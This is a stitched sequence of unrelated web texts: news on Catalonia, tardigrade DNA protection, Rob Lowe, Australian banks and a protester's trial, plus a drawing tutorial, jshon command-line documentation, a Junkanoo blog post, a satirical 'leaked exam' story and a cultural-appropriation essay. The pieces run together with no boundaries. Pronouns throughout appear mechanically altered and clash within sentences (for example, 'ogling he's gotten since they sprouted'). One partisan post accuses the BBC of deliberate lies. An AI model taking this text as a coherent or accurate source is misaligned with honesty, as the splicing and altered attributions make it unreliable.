"Catalonia grew under Franco," they said. "Since democracy came, they've just been trying to pull down the country."
Nuria Guixa, 42, an administrator, said, "We just want to live in a quiet peaceful way like we did before all this happened. Nobody wants a war or a big fight."
They looked forward to December elections. "Now everybody will have the right to vote, in normal elections. You can vote pro-independence or for unity with Spain. Then we'll see what people want."
Raul Gallego Abellan contributed to this report.
Read more:
Catalonia finally declared independence — but Spain vows it won't last long
The future of Catalonia may well hinge on an 84-word section of the 1978 Spanish Constitution
Whatever happens in Catalonia, its anger with Spain is a sign of things to come
Today's coverage from Post correspondents around the world
Like Washington Post World on Facebook and stay updated on foreign news
About
Cars on Fire is a highly addictive Russian Roulette style card game where you try to be the last one standing while your competition bursts into flames.
The game is fast paced where players keep drawing cards until all other players draw a fire card and are out of the game. This can get quite intense as the deck gets smaller and smaller. The deck contains fire cars, action cards and car cards.
We've put together a prototype of the game using photographs that we have taken at various car events. However, we are currently working on different original car artwork that will be used in the finished game (this will also ensure that we aren't risking a lawsuit).
The game was created by David Hurth (Editor-in-Chief T.S.C.G.) and is their way of helping to spread their love of cars with the world.
We already have a manufacture lined up to produce the card game and all we need is your help to get the project off the ground.
It's the perfect game for those that love cars or fire.
How It Works
Highlighted Rewards
Media playback is unsupported on your device Media caption Meet the planet's hardiest animal - the tardigrade - that has just revealed a genetic secret that could help protect human cells.
Researchers have discovered a genetic survival secret of Earth's "hardiest animal".
A gene that scientists identified in these strange, aquatic creatures - called tardigrades - helps them survive boiling, freezing and radiation.
In future, it could be used to protect human cells, the researchers say.
It was already known that tardigrades, also known as water bears, were able to survive by shrivelling up into desiccated balls.
But the University of Tokyo-led team found a protein that protects its DNA - wrapping around it like a blanket.
Image copyright S Tanaka/H Sagara/T Kunieda Image caption The tardigrade-specific gene helps the animal resist radiation
The scientists, who published their findings in the journal Nature Communications, went on to grow human cells that produced that same protein, and found that it protected those cells too.
This, the scientists suggest, means that genes from these "extremophiles", might one day be used to protect living things from radiation - from X-rays, or as a treatment to prevent damage from the Sun's harmful rays.
Tardigrades are more commonly - and cutely - known as water bears. Scientists had thought that they survived radiation exposure by repairing the damage done to their DNA. But Prof Takekazu Kunieda, of the University of Tokyo, and their colleagues, carried out an eight-year study of a tardigrade genome to pinpoint the source of its remarkable resilience.
Extreme genetics
To identify their secret weapon, researchers scrutinised the genome of one tardigrade species, looking for proteins that were attached to the DNA, and that therefore might have a protective mechanism. They found one that they have called "Dsup" (short for "damage suppressor").
Image copyright S Tanaka/H Sagara/T Kunieda Image caption The team studied the tardigrade, Ramazzottius varieornatus
The team then inserted the Dsup gene into human cells' DNA, and exposed those modified cells to X-rays; Dsup-treated cells suffered far less DNA damage.
Prof Mark Blaxter of the University of Edinburgh told BBC News that the study was "groundbreaking".
"This is the first time an individual protein from a tardigrade has been shown to be active in radiation protection.
"[And] radiation is one of the things that's guaranteed to kill you."
By sequencing and examining the genome, this study also appears to resolve a strange genetic controversy about these creatures. Research published in 2015, involving a different tardigrade species, concluded that the creature had "acquired" a portion of its DNA from bacteria through a process called horizontal gene transfer.
That study suggested that some of these beasts' notorious imperviousness had been snipped out of the bacterial genetic code.
This study found no evidence of this gene transfer.
Aquatic space-bears
Image copyright Other Image caption Tardigrades are microscopic animals commonly known as water bears
In 2007, a European Space Agency satellite carried thousands of tardigrades into the vacuum of space. Named the Tardis - tardigrades in space - project, it revealed that the animals were able not only to survive, but to reproduce upon returning to Earth
There are more than 800 described species of tardigrade, but thousands more are not yet named
Tardigrades live everywhere where there is water, from the soil in your local park to the bottom of the sea to glaciers in Anarctica
To find your own tardigrade, find some moss, add water and squeeze the water out of the moss on to a microscope slip (any light microscope should work). The little animals will come out with the water (tip courtesy of Mark Blaxter).
The tardigrades themselves, though, were far more resistant to X-rays than the human cells that the researchers manipulated. "[So] tardigrades have other tricks up their sleeves, which we have yet to identify," said Prof Matthew Cobb from the University of Manchester.
With further research, scientists think that genes like Dsup could make it safer and easier to store and transport human cells - protecting, for example, delicate human skin grafts from damage. Prof Kunieda and their co-author on the study, Takuma Hashimoto, applied to patent the Dsup gene in 2015.
Prof Cobb added that, in principle, "these genes could even help us bioengineer organisms to survive in extremely hostile environments, such as on the surface of Mars - [perhaps] as part of a terra-forming project to make the planet hospitable for humans".
And scientists with a fascination for tardigrades think this discovery could be the tip of the iceberg.
Prof Blaxter said that tardigrade research could even explain how exactly "radiation damages DNA, and how we might prevent DNA damage from other sources".
Prof Takekazu Kunieda told BBC News that they hoped more researchers would join the "tardigrade community".
"We believe there [are] a lot of treasures there," they added.
What do you think of when you think of Rob Lowe? Hotness?
Shame on you.
In an interview with Vulture this week, the 51-year-old actor argued that Hollywood has a problem with the objectification of men, not just women.
"People go on and on about the objectification of women, and rightly so," Lowe said. "But what about the objectification of men? When was the last time you saw 'Grey's Anatomy'?"
The topic is on Lowe's mind because of their new show, "The Grinder," on Fox, which premiered on Wednesday to solid reviews. In the comedy, they play an actor who starred as a lawyer in a legal drama (also called "The Grinder") for years, before quitting the show in part because they felt objectified.
In the Vulture interview, Lowe mentions an upcoming scene from "The Grinder" in which their character tries to object to their objectification. Lowe explains that the creator of the show-within-the-show, played by Jason Alexander, asks them to take their shirt of "one too many times," so they get upset. But when Alexander's character responds, "Man, you're the Grinder. You're the sex symbol. Don't overthink this. Give the people what they want," Lowe's character reluctantly agrees to do a comedic striptease.
Lowe's protestations aside, the objectification of men in Hollywood is actually a topic that's gotten a fair amount of attention recently, in part because of the emphasis movies and TV shows like "Magic Mike" and, yes, Shonda Rhimes' "Grey's Anatomy" place on male beauty.
But not everyone thinks it's a bad thing. Lowe's "Parks and Recreation" co-star Chris Pratt, for example, said back in June that they haven't been offended by the ogling he's gotten since they sprouted a six-pack.
"I think it's appalling that for a long time only women were objectified, but I think if we really want to advocate for equality, it's important to even things out," Pratt told The Guardian.
“Not objectify women less, but objectify men just as often as we objectify women," they continued. "There are a lot of women who got careers out of it, and I'm using it to my advantage. And at the end of the day, our bodies are objects."
Now, this last sentence seems to conflate two different meanings of the word "object." It's accurate to say that the human body is an "object" in the sense that it is a physical entity, but the verb "objectify" refers to the division between subject and object. When we say that objectification is a problem, we're saying that we shouldn't think of other people only in relation to our subjective desires, not that that we shouldn't point out that people have physical bodies.
Still, Pratt is onto something that Lowe glosses over: the objectification of female bodies is more problematic than the objectification of male bodies because of our history of thinking of women as nothing more than sex objects. On the other hand, Lowe would probably admit that point -- while insisting that neither is ultimately a good thing.
Also on HuffPost:
How to Draw Onix from Pokémon Step-by-Step Tutorial
Onix is a rock snake looking character from Pokémon. In these 12 easy steps you can learn how to draw Onix known from Pokémon and the adventures game of Pokémon Go. Let's get started!
How to draw Onix Step 1
1.First of all draw a hook shape which gives the 'spine' of Onix. At the end of it, draw a circle for the head.
Step 2.
2. By continuing our drawing, add more circles in different sizes and shapes coming from the head to the tale. As you can see the shapes of these circles sometimes more oval the other times more round.
Step 3.
3. Now let's start making the head's details. First of all, add a guideline as it would cut off a piece of the head. Continuing, outline the head's rocky shape. Just draw a trapeze geometrical shape which connects to the head.
Step 4.
4.Continuing Onix's head, draw the forehead on the top of the head just like on the photo above.
Step 5.
5.Furthermore let's add the eyes under the previously drawn guideline. The half circle shape of the eyes gives a kind of evil look to ourPokemon hero. Also, draw the nose. It almost looks like the legs of a stick figure.
Step 6.
6. Finish drawing the jaw and the chin. Since Onix is a rocky snake don't be afraid to use sharper, more angular lines.
Step 7.
7. Finishing the head just add some lines which will make the face look more rocky and tough and finally draw the horn on the top of the head. How is it looking?
Step 8.
8.From now you will probably need to take your time. Start shaping the first circle on the body just like it was a rock. Add some lines and cracks on the circle. This is what gives the characteristic shape to Onix.
Step 9.
9. Just keep on drawing as you did with the first one. Don't worry it will start getting easier. We're almost there!
Step 10.
10. Just keep on going until you finally reach the last one. If you're finished with that as well, move to step 11.
Step 11.
11. Before the final step, contour the main lines and erase the rest. If you're not sure about what to contour and what to leave, you can always check my video or the photo above.
Step 12.
12. Let's colour it! You can always use the colours and techniques I use in the drawing but also don't hesitate to use your own creativity if you would like. After all, please don't forget to send me a photo of your drawing, so I can share it on my Facedrawer Facebook page. Thanks for drawing with me! Have you seen the how to draw chibi pikachu drawing lesson?
And here is the Infographic
They're so huge compared to Australia, they're “Too Big To Save”
By Lindsay David, Australia, author of Print: The Central Bankers Bubble , founder of LF Economics:
Australia's Big 4 put the American Big 4 to shame
JP Morgan, Bank of America, Citigroup, and Wells Fargo are the four largest banks in the United States. The total assets on their balance sheets combined equaled the equivalent of 48.3% of total American GDP in 2014.
That sounds like a crazy number until you compare that to the total assets of the Big four Australian banks: ANZ, Commonwealth (CBA), National Australia Bank (NAB), and Westpac (WBC) hold relative to Australian GDP
This was not always the case.
Using the CBA as an example, its balance sheet has grown at a stifling pace relative to the size of the Australian economy.
So how does a bank like the CBA go from holding assets the equivalent of 14% of Australian GDP in 1999 to 51% of GDP by 2014? The answer to that question is simple:
By taking on more risk.
It did so via a get-rich-quick scheme by getting a nation to depend on using leverage to flip houses as it's wealth creation model).
It's funny how the balance sheets of four primarily domestic-focused retail banks have become so much larger over the period when house prices have significantly outpaced all other economic fundamentals.
So the next question:
How do you save four banks holding assets on their balance sheets the equivalent of almost 220% of Australian GDP if the Australian economy goes belly up? By Lindsay David, Australia Boom to Bust Blog , author of Print: The Central Bankers Bubble
Australia's households are the third most indebted in the world, relative to GDP, after having passed the Netherlands in 2014. Aussies are now closing in on the leader of the pack, Denmark, and second place, Switzerland. And it's all based on one factor, the Great Australian Household Debt Trap. Read… Australia's “Largest Housing Bubble on Record” in 4 Charts
Enjoy reading WOLF STREET and want to support it? Using ad blockers – I totally get why – but want to support the site? You can donate “beer money.” I appreciate it immensely. Click on the beer mug to find out how:
Would you like to be notified via email when WOLF STREET publishes a new article? Sign up here.
Readers of HEqual may remember an article from last year where we exposed some of the BBC's lies about Philip Davies MP. On that occasion, the organisation morphed their criticism of feminists into criticism of women as a whole, thus turning reality on its head and smearing them as a sexist rather than an opponent of misandrist ideology. The BBC quietly retracted those false claims about Davies, yet they clearly haven't learned their lesson and have been lying about the very same politician once again.
In an article concerning the learning disabled and the minimum wage, the BBC wrote the following:
“Conservative MP Philip Davies told Parliament that disabled people should work for less than the minimum wage“
A version of the article we saw at the time helpfully linked to the debate in question and the few people who followed said link would have soon noticed that the BBC were up to their usual tricks and completely misrepresenting Davies' words. The official Hansard record of the debate notes their words as follows:
I am sure that all Members want everybody to have the opportunity to get a job, to develop their career and for it to flourish in every possible way, but for some people the national minimum wage may be more of a hindrance than a help, and if those people—in my view, some of the most vulnerable people in our society—consider it a hindrance and feel that for a short period taking lower pay to get on the first rung of the jobs ladder is a good thing, I do not see why we should stand in their way.
Clearly the above quote bears almost no resemblance to the BBC's version of events. They imply they think all disabled people are somehow unworthy of the same wages as everyone else. Furthermore, the broadcaster pretends Davies wants to force all these disabled people to accept lower wages, when in reality they clearly think it should be a short-term option that is voluntary and only for some (such as the learning disabled).
As ever, we used the amazing News Sniffer site to see how the BBC handled matters and how long they left the lies in place. The article was published on March 2nd 2017 and underwent a total of eight edits on the day of publication with the Davies smear in place from the start. Unusually for the BBC, it then began making further changes some 12 days after publication, which would imply it had received and read the complaints by that date. The BBC's first edit consisted of two incredibly minor changes, such as replacing the term “less than” with “below”. It then took a further twenty hours, for the vastly more significant lies about Davies to be removed and replaced with accurate content, with a note added to the end of the article stating the following:
This report has been amended to make clear that Philip Davies said people with disabilities should have the option of working for less than the minimum wage.
The conduct of the BBC here is disturbing for a number of reasons. Blatant lies about Davies were left in place on the BBC website for an incredible thirteen days and these were hugely damaging to their reputation. Most views of an article are likely to be within 24-48 hours of publication, so its clear that time is of the essence when it comes to fixing such defamatory remarks. However, the News Sniffer history indicates the BBC may well have deliberately delayed taking down the content for almost a day instead of fixing the problem as soon as they became aware of it.
Perhaps a bigger problem is with overall BBC transparency. It's certainly useful to have the note added to the end of the article, though it doesn't really expose the lies that went before nor offer any sort of apology. Furthermore, it is still actually lacking accuracy since it omits the term “some” therefore still implying Davies is talking about all disabled people. What makes matters worse is that there's no reference to the change anywhere else on the BBC. There's zero mention in any bulletins and it's corrections and clarifications page similarly fails to note what occurred, never-mind apologise. The end results of this is zero awareness of teh BBC's retraction, and so next to no one who read the original lies will learn the truth.
Sceptical readers may well put all this down to a simply “mistake”, but the content in question needs to be viewed in the wider context of the BBC's treatment of Davies and those others who speak out on equality issues. The BBC's Jane Garvey was astonishingly hostile when interviewing Davies in December and their Twitter feed shows they think he's a “pillock”. A further BBC interview with Davies in April attempted to smear them as believing women have “too many rights” and of course we secured retractions back in December and in 2011 when the last Conservative MP to criticise feminism was also falsely portrayed as a sexist attacking women.
What we have is a very clear pattern of the BBC completely misrepresenting they arguments of critics of feminism and attempting to portray them as hating not just women, but now also the disabled and other groups. Clearly this is partly deliberate, but perhaps another factor to consider is the views and politics of most BBC staff and the BBC environment as a whole. Those in the SJW BBC/Guardian bubble exclusively consume media attacking Davis, and they almost exclusively associate with their opponents, with for example the Women's Equality Party co-founder Sandi Toksvig being an ever-present on all manner of BBC TV and radio shows. So, while the likes of Talk Radio's Julia Hartley Brewer brilliantly take apart feminists who smear Davies as sexist, the BBC instead believes such myths to be factual, either due to brainwashing, ignorance or simply denial. Thus when they publish defamatory statement about critics of feminism it's not necessarily 100% malicious every time, they're often just so out of touch with reality that they simply don't notice.
Ultimately, if these were truly mistakes, we'd see the BBC repeatedly smearing feminists too or perhaps exaggerating the achievements and giving unearned praise to critics of feminism, yet this never seems to occur. In fact the BBC is still to even report on the domestic abuse police caution received by Labour MP Sarah Champion, despite the fact she's the party's spokesperson for domestic abuse!.
It's now two years since the BBC banned men from the only ever election hustings debate featuring a party for men and boys. Davies' constituency is to be contested by the Women's Equality Party shortly and if they're truly impartial and consistent, the BBC will of course be banning women from whichever broadcast is set to feature a WEP candidate.
Advertisements
Fans watch a KBO preseason game between KT Wiz and Doosan Bears at KT Wiz Park in Suwon, Gyeonggi, on Saturday. The stadium went through remodeling with the latest IT technology. [NEWSIS]
When Internet of Things (IoT) technology meets baseball, what will happen? KT Wiz, the Korea Baseball Organization's latest member and 10th club in the league, might give a glimpse of the future.On Saturday, KT Wiz Park, formerly known as the Suwon Baseball Stadium, was packed with baseball fans as KT Wiz hosted its first KBO game against the Doosan Bears. Although it was a preseason game, there were no empty seats.In fact, it was the first time since Oct. 5, 2007, that a KBO game was held in the stadium.“I firmly believe that KT will be a special thing for Suwon,” said Suwon Mayor Yeom Tae-young at the opening ceremony on Saturday. “We will keep the promise of being a premium stadium and the city will put its best effort to making it a friendly stadium.”Originally built in 1989, the remodeling of the stadium began in July 2013 and cost 30 billion won ($2.6 million). The ballpark now has four floors and 20,225 seats. It is 120 meters (394 feet) from home plate to the central fence.KT, the nation's second largest mobile carrier and owner of the KBO club, said its marketing theme is “BICTainment,” which combines “baseball,” “ICT” and “entertainment.”Facility-wise, the KT Wiz Park excels. From a barbecue zone to grass zones beyond the outfield where people can lie down and picnic, there are various seating choices. There is also an outdoor sports pub in which people can drink and eat while watching the game.In addition, the high-definition electronic scoreboard, which is 28 meters long and 9 meters high, is the only of its kind in Korea's baseball stadiums. Costing 2 billion won, the board can display two or three screens at the same time and can show messages from fans in real time.But what makes this ballpark “smart” is its use of the latest IoT technology.At KT Wiz Park, you won't find a ticket booth with long lines because fans can use the mobile application “Wizzap” to book, pay for and receive their tickets. There are special gates for mobile ticket holders, which use both barcode readers and near field communication (NFC).First-time visitors will have no trouble finding their seats in the remodeled stadium. KT Wiz said the exact location of the seat will appear on a visitor's smart device and, like a car navigation system, the visitor will be guided to the destination.When fans want to order chicken and beer, known as “chimac” in Korean, they won't have to trot to the stands inside the stadium. After a few clicks on their smart devices, the chicken and beer will be delivered to them.How does the delivery man know the exact location? In KT Wiz Park, there are 145 beacons installed. Beacons are transmitters that use Bluetooth low energy 4.0 technology to interact with people's mobile devices. Apple started a service called iBeacon in late 2013.One of the beacons' advantages is they can detect and communicate with a device better than NFC. NFC recognizes a smartphone when it is within 5 centimeters of a tag, but a beacon can accurately locate the device even 50 meters away.Connecting to Wi-Fi can be difficult when masses of people are gathered, but this will not be the case for KT Wiz Park. KT said 210 Internet access point devices are installed, which will allow 20,000 people to watch high-quality videos at the same time. They can also receive various information about players and the game in real time through their smart devices.“Any visitors who register with ‘Wizzap' can use this service,” said KT Wiz's New Business Team leader Kang Shin-hyuk. “Through these systems, we can conduct personalized marketing for each fan.”SK Wyverns, a baseball club run by SK Group, which has its own telecommunications affiliate, SK Telecom, will also start using beacons from this season at its Munhak Stadium in Incheon. They will interact with the application “SK Wyverns PLAY WITH.”Hanwha Eagles in Daejeon and NC Dinos in Masan, South Gyeongsang, are also trying to establish beacons at their home stadiums.Use of IoT in sports marketing is a global trend. Major League Baseball has been using beacon technology since 2013. According to 2013 MLB data, 28 of 30 stadiums have installed beacons and started service.In the National Football League, the Denver Broncos last year collected $75,000 alone through seat upgrade promotions using beacons. The system checks for vacant premium seats and then offers upgrades to other ticket holders for a cheap price. The Broncos reportedly paid $5,000 to install its beacons.For KT, the use of these technologies will also help improve its team's competitiveness. A Player Innovation Platform is a system that analyzes a baseball's direction during the game and stores the data in KT's cloud computing system, which is used to coach players later.BY JOO KYUNG-DON, KIM WON [joo.kyungdon@joongang.co.kr]
Twice as fast, 1/6th the memory
Jshon parses, reads and creates JSON. It is designed to be as usable as possible from within the shell and replaces fragile adhoc parsers made from grep/sed/awk as well as heavyweight one-line parsers made from perl/python. Requires Jansson
Download jshon.tar.gz
Forum thread
Github
Or installation with pacman -S jshon
Jshon loads json text from stdin, performs actions, then displays the last action on stdout. Some of the options output json, others output plain text meta information. Because Bash has very poor nested datastructures, Jshon does not try to return a native bash datastructure as a tpical library would. Instead, Jshon provides a history stack containing all the manipulations.
The big change in the latest release is switching the from pass-by-value to pass-by-reference. In a typical use case (processing AUR search results for 'python') by-ref is twice as fast and uses one sixth the memory. If you are editing json, by-ref also makes your life a lot easier as modifications do not need to be manually inserted through the entire stack.
ACTIONS
Each action takes the form of a short option. Some require arguments. While many instances of jshon can be piped through each other, actions should be chained sequentially to reduce calls. All examples will work on this json sample:
{"a":1,"b":[true,false,null,"none"],"c":{"d":4,"e":5}} jshon [actions] < sample.json
-t (type) returns string, object, array, number, bool, null
jshon -t -> object
-l (length) returns an integer. Only works on string, object, array.
jshon -l -> 3
-k (keys) returns a newline separated list of keys. Only works on object.
jshon -k -> a b c
-e index (extract) returns json value at "index". Only works on object, array. Negative array indexes wrap around.
jshon -e c -> {"d":4,"e":5}
-a (across) maps the remaining actions across the selected element. Only works on objects and arrays. Multiple -a call can be nested, though the need is rare in practice.
jshon -e b -a -t -> bool bool null string
-s value (string) returns a json encoded string. Can also be -inserted to an existing structure.
jshon -s "back\\slash" -> "back\\\\slash"
-n value (nonstring/number) returns a json element to be later -inserted into an existing structure. Valid values are true , false , null , array , object , integers and floats. Abbreviates t , f , n , [] and {} respectively also work.
jshon -n object -> {}
-u (unstring) returns a decoded string. Works on string, int, real, boolean, null.
jshon -e b -e 3 -u -> none
-p (pop) pops the last manipulation from the stack, rewinding the history. Useful for extracting multiple values from one object.
jshon -e c -e d -u -p -e e -u -> 4 5
-d index (delete) removes and item in an array or object. Negative array indexes will wrap around.
json -d b -> {"a":1,"c":{"d":4,"e":5}}
-i index (insert) is complicated. It is the reverse of extract. Extract puts a json sub-element on the stack. Insert removes a sub-element from the stack, and inserts that bit of json into the larger array/object underneath. Use extract to dive into the json tree, delete/string/nonstring to change things, and insert to push the changes back up the tree.
Arrays are handled in a special manner. Passing integers will insert a value without overwriting. Negative integers are acceptable, as is the string 'append'. To overwrite a value in an array: delete the index, -n/s the new value, and then insert at the index.
jshon -e a -i a -> the orginal json jshon -s one -i a -> {"a":"one", ...}
Non-manipulation
These are meta options that do not directly edit json. They are called at most once per invocation and are distinguished by capital letters.
-P (jsonp) strips a jsonp callback before continuing normally.
-S (sort) returns output sorted by key, instead of the original ordering.
-Q (quiet) disables error reporting on stderr, so you don't have to sprinkle 2> /dev/null throughout your script.
-V (by-value) enables pass-by-value on the edit stack. Enable only for compatibility with old jshon scripts.
-C (continue) on potentially recoverable errors. For example, extracting values that don't exist will add 'null' to the edit stack instead of aborting.
REAL EXAMPLE Let's say you are making a script to download backgrounds from the internet. Specifically, the pictures on EarthPorn. Reddit has a json interface:
curl http://www.reddit.com/r/earthporn.json
But now we need to extract the URLs out of there. I could fire up a text editor and dive into the json layout, but it is faster to explore the json using Jshon as a browser. If I find an object, I look at the keys. If an array, the first element.
$ jshon -t < earthporn.json object $ jshon -k < earthporn.json kind data $ jshon -e data -t < earthporn.json object $ jshon -e data -k < earthporn.json modhash children after before $ jshon -e data -e children -t < earthporn.json array $ jshon -e data -e children -e 0 -t < earthporn.json object $ jshon -e data -e children -e 0 -k < earthporn.json kind data $ jshon -e data -e children -e 0 -e data -t < earthporn.json object $ jshon -e data -e children -e 0 -e data -k < earthporn.json .... SNIP url .... $ jshon -e data -e children -e 0 -e data -e url -u < earthporn.json http://i.imgur.com/.....
Cool, now we know where a single picture is in the hierarchy. (The -u on the end removes any json-safe encoding.) But how do we get all the pictures? Each url is under a different array index. So we use the -a action to map across all the elements of the array.
jshon -e data -e children -a -e data -e url -u < earthporn.json
Yup, simply replace the -e 0 and all the links are extracted. Of course, not all URLs are images so a quick regex cleans those up. The final script looks like
curl -s http://www.reddit.com/r/earthporn.json | \ jshon -e data -e children -a -e data -e url -u | \ grep '.\(jpe\|jp\|pn\)g$'
Working with *nix text processing Jshon was made to be part of the usual text processing pipeline. However, every single -u is printed out to its own line. Most shell tools expect fields to be tabbed separated, and newlines between sets of fields. The paste tool does this. However, paste breaks down on blank lines so use sed to pad out the empty lines.
jshon ... | sed 's/^$/-/' | paste -s -d "\t\t
" | ....
The arguments need a little explaining.
-s is mysteriously needed for paste to correctly handle input.
-d is less obvious from the manpage, because it can take multiple characters which are looped through. The above example concatenates every three lines together.
Though New Year's Eve is pretty exciting around our Pasadena neighbourhood (we live within the float marshaling area for the Tournament of Roses Parade), I'm beyond excited that we'll be ringing in 2015 on Green Turtle Cay!
You see, Bahamians welcome the New Year with a parade of their own. Similar to Rio's Carnival or Mardi Gras in New Orleans, Junkanoo is a traditional Bahamian festival that began in the 17th century.
Back then, slaves were given a three-day Christmas break, when they were free to leave their plantations to be with their families. They celebrated this holiday by donning masks and costumes and playing African-inspired music on crudely fashioned instruments.
Four centuries later, Junkanoo has evolved into a large, festive Bahamian holiday celebration with organized groups of performers parading (“rushing”) in elaborate, crepe paper-covered costumes, accompanied by whistles, cowbells, goatskin drums and brass instruments.
The origin of the name “Junkanoo” is unclear. Some claim it comes from the French “l'inconnu,” meaning “the unknown,” in reference to the masks worn by Junkanoo performers. Others believe it was named in honour of “John Canoe,” an African chief who reportedly demanded that slaves be given the right to a holiday break.
Though smaller Junkanoo parades are staged on some Bahamian out islands, the main event takes place in downtown Nassau during the early morning hours of Boxing Day (Dec 26) and New Year's Day. Thousands of performers and musicians, representing a number of different competing groups, rush along Bay Street until daybreak. Cash prizes are awarded for best music, costumes and overall group presentation.
Truthfully, though Nassau's Junkanoo is spectacular, I prefer the New Year's Junkanoo parade on Green Turtle Cay. First, it takes place in the afternoon on New Year's Day — no need to drag yourself out of bed in the middle of a damp night to fight rowdy crowds.
Second, in the daylight, you can better (and more closely) appreciate the colour and detail in the gorgeous costumes. Plus, this year, we'll be able to enjoy Junkanoo from the comfort of our own front porch!
I must admit, I did feel a pang or two the other night when three Rose Parade floats passed by our home en route to the tents where they'll be decorated. But it's been eight years since we've experienced Green Turtle Cay's New Year's Junkanoo parade, and I can't wait!
© 2016 Amanda Diedrick LittleHousebytheFerry.com
Should Porsche Make Cars That Even Hint At Driving Themselves?
2014 Porsche ACC InnoDrive - Click above for high-res image gallery
CPS used joint enterprise principle, usually reserved for gang crime, in the case of Lisa McKenzie, who was cleared of all charges
Legal experts have criticised the prosecution of a protester who was arrested when a fellow activist placed a sticker on a window of a block of luxury flats.
The incident has raised concerns that the police are targeting known protesters for prosecution, even if they are non-violent, using joint enterprise laws.
Lisa McKenzie, a research fellow at the London School of Economics, was accused of assisting an unknown person to put the sticker on a window to protest against “poor doors” – separate entrances for social housing tenants in upmarket blocks that also cater for private tenants.
Our right to protest should be sacrosanct. Unforgivably, it's being betrayed | Owen Jones Read more
After they were found not guilty at Stratford magistrates court - the judge ruled there was no evidence against them - McKenzie said they had been picked out by police.
“The police were asked how they knew it was me and how they knew my name, and they said that I had been profiled in the meetings earlier, and the judge said they were very, very uncomfortable with how I had been profiled,” they told the Guardian.
Joint enterprise means a person may be found guilty for another person's crime if it is judged that they shared a common purpose. It is more commonly used in connection to gang violence.
McKenzie's barrister, Ian Brownhill, who has previously represented a number of Occupy protesters, said it was “dangerous because, in terms of joint enterprise, if you are joined together in a single purpose – of course you are, in a large demonstration – and part of it turns disorderly, then they can try and hold you responsible”.
Facebook Twitter Pinterest Lisa McKenzie celebrates at the Salmon and Ball in Bethnal Green with friends. Photograph: Linda Nylind for the Guardian
“What they have done in this case is they have picked out Lisa and said Lisa is responsible for everything that crowd of protesters has done,” they added.
Leading lawyers and campaigners have criticised the case being brought to court by the police and the Crown Prosecution Service.
“This whole case smacks of overkill by the prosecutors,” said Mike Schwartz, a solicitor and expert in protest law. “It is questionable whether they should have been profiled, and prosecuted in the first place. And to have had the joint enterprise legal principle – most commonly used in drug and gang violence cases in the Old Bailey – wheeled out against her; fortunately, the judge had the wisdom to see what was going on. But the police and prosecutors must learn the lessons before cases get off the ground.”
Tom Wainwright, a barrister and author of The Protest Handbook, said the case appeared to fail the CPS test on both the likelihood of success and the public interest. “There was clearly never any prospect of a conviction,” they said. “Was it really necessary to take this to court?
“These prosecutions are indirectly affecting the right to protest, because even if there is no conviction people are restricted from protesting by bail conditions, and have a criminal trial hanging over their heads for months.”
Wainwright's co-author and fellow barrister Anna Morris was one of several human rights lawyers to draw a comparison with the case of the seasoned peaceful protester John Catt. The 90-year-old, from Brighton, challenged the retention of their data on the national domestic extremism database – kept despite them never having been involved in any criminality. Their case, dismissed by the supreme court, will now be heard in Strasbourg.
“Many protesters feel that their profiling and data retention is of itself a form of guilt by association,” they said. “The use of joint enterprise principles, more usually seen in murder charges, are controversial. In relation to public protest, their use may represent a change in strategy being deployed by the police and prosecuting authorities to pursue criminal charges against peaceful protesters.”
McKenzie's arrest came after they took part in a protest organised by the anarchist group Class War on 19 February outside One Commercial Street, a 21-storey block of flats in east London.
Prosecutors alleged that one demonstrator caused £50 worth of damage by sticking a sticker to a window, although it was accepted that McKenzie did not stick it there herself.
The district judge, Richard Hawgood, ruled that McKenzie had no case to answer on a charge of using threatening words or behaviour, on which the prosecution had also given evidence. They found them not guilty of criminal damage.
Kevin Blowe, coordinator of the policing pressure group Netpol, said they expected to see further police interest in groups protesting the housing crisis, such as Class War.
“We've seen evidence that police are very keen to establish links between groups who are active on this issue and whether they are likely to grow,” they said, adding that their group had advised those attending the student demonstration on 4 November to cover their faces in order to draw attention to the privacy rights of activists.
The CPS has been approached for comment.
OREM, UT – Utah Vivint University's Professional Sales Program Midterm Exam Leaked
It only took a few days after the announcement of the VIVINT™-funded Professional Sales Program before the pilot-program's midterm exam was leaked to the public. The source of the leak, Dolly Dennings — the front desk employee of a spray tan establishment — claims this was not whistleblower work of a program insider, but rather a guinea-pig student's attempt to use the document as collateral for a yearlong spray tan membership; that 10.5/15 in anything is a currency-backed type of score left the source and this correspondent flabbergasted.
In addition to rigorous exams and classwork, the program will also feature a compulsory 3 month summer internship, in which participants will be “paid” in experience and van fumes, a cheap alternative to today's costly designer drugs. The inevitable comparisons to the Missionary Training Center in nearby Provo have shown up on Twitter already.
There is no word yet on when UVU will add the color orange to its institutional branding and logos.
RSVP for Intersectionality Calls
Jarune Uwujaren explains that there needs to be some element of mutual understanding, equality, and respect for it to be a true exchange.
–
Cultural appropriation is a term that isn't often heard in daily conversation, which means it's inevitably misunderstood by those who feel attacked by feminists, sociologically-informed bloggers, and others who use the term.
Many a white person sporting dreadlocks or a bindi online has taken cultural appropriation to mean the policing of what white people can or can't wear and enjoy.
Having considered their fashion choices a form of personal expression, some may feel unfairly targeted for simply dressing and acting in a way that feels comfortable for them.
The same can be said for those who find criticisms of the Harlem Shake meme and whatever it is Miley Cyrus did last month to be an obnoxious form of hipsterdom – just because something has origins in black culture, they say, doesn't mean white artists can't emulate and enjoy it.
And then there are people who believe that everything is cultural appropriation – from the passing around of gun powder to the worldwide popularity of tea.
Don't like ads? Become a supporter and enjoy The Good Men Project ad free
They're tired of certain forms of cultural appropriation – like models in Native American headdresses – being labeled as problematic while many of us are gorging on Chipotle burritos, doing yoga, and popping sushi into our mouths with chopsticks.
They have a point.
Where do we draw the line between “appropriate” forms of cultural exchange and more damaging patterns of cultural appropriation?
To be honest, I don't know that there is a thin, straight line between them.
But even if the line between exchange and appropriation bends, twists, and loop-de-loops in ways it would take decades of academic thought to unpack, it has a definite starting point: Respect.
What Cultural Exchange Is Not
One of the reasons that cultural appropriation is a hard concept to grasp for so many is that Westerners are used to pressing their own culture onto others and taking what they want in return.
We tend to think of this as cultural exchange when really, it's no more an exchange than pressuring your neighbors to adopt your ideals while stealing their family heirlooms.
True cultural exchange is not the process of “Here's my culture, I'll have some of yours” that we sometimes think it is. It's something that should be mutual.
Just because Indian Americans wear business suits doesn't mean all Americans own bindis and saris. Just because some black Americans straighten their hair doesn't mean all Americans own dreadlocks.
The fact is, Western culture invites and, at times, demands assimilation. Not every culture has chosen to open itself up to being adopted by outsiders in the same way.
And there's good reason for that.
“Ethnic” clothes and hairstyles are still stigmatized as unprofessional, “cultural” foods are treated as exotic past times, and the vernacular of people of color is ridiculed and demeaned.
